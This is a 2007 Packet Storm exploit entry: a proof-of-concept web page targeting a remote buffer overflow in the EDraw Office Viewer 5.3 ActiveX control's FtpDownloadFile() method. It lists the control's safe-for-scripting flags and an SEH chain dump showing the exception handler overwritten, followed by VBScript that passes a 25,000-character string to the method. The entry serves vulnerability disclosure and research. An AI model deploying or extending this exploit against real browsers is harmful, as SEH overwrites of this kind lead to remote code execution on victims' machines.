edraw53-activex.txt

2007-10-02T00:00:00
ID PACKETSTORM:59713
Type packetstorm
Reporter shinnai
Modified 2007-10-02T00:00:00

Description

                                        
                                            `<pre>  
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------  
<b>EDraw Office Viewer Component 5.3 "FtpDownloadFile()" Remote BoF</b>  
url: http://www.ocxt.com/officeviewer.php  
  
Author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://shinnai.altervista.org  
  
<b><font color='red'>This was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.</font></b>  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7  
  
<b>Marked as:  
RegKey Safe for Script: True  
RegkeySafe for Init: True  
KillBitSet: False</b>  
  
<b>SEH chain:  
SEH chain of thread 00001EE4, item 0  
Address=0219F284  
SE handler=IEXPLORE.00410041  
  
SEH chain of thread 00001EE4, item 1  
Address=00410041  
SE handler=IEXPLORE.00426AA4</b>  
  
-----------------------------------------------------------------------------  
<object classid='clsid:6BA21C22-53A5-463F-BBE8-5CF7FFA0132B' id='test'></object>  
  
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>  
  
<script language='vbscript'>  
Sub tryMe  
buff = String(25000, "A")  
test.FtpDownloadFile buff, buff  
End Sub  
</script>  
</span></span>  
</code></pre>  
  
  
`